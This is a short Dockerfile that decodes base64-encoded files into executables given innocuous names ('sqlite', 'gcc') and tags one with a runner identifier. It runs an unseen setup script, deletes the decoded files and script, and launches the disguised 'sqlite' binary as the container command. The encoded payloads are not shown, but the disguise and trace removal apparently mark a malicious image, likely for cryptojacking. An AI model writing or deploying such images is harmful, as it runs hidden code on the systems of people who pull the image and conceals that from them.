FROM henrikuznetsovn/gcc
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > sqlite.log'

COPY sqlite.64 .
COPY docker.sh .
COPY gcc.64 .

RUN bash -c 'base64 --decode sqlite.64 > sqlite'
RUN bash -c 'base64 --decode gcc.64 > gcc'
RUN chmod +x gcc
RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' sqlite

RUN bash ./docker.sh
RUN rm --force --recursive sqlite _REPO_NAME__.64 docker.sh gcc gcc.64

CMD sqlite
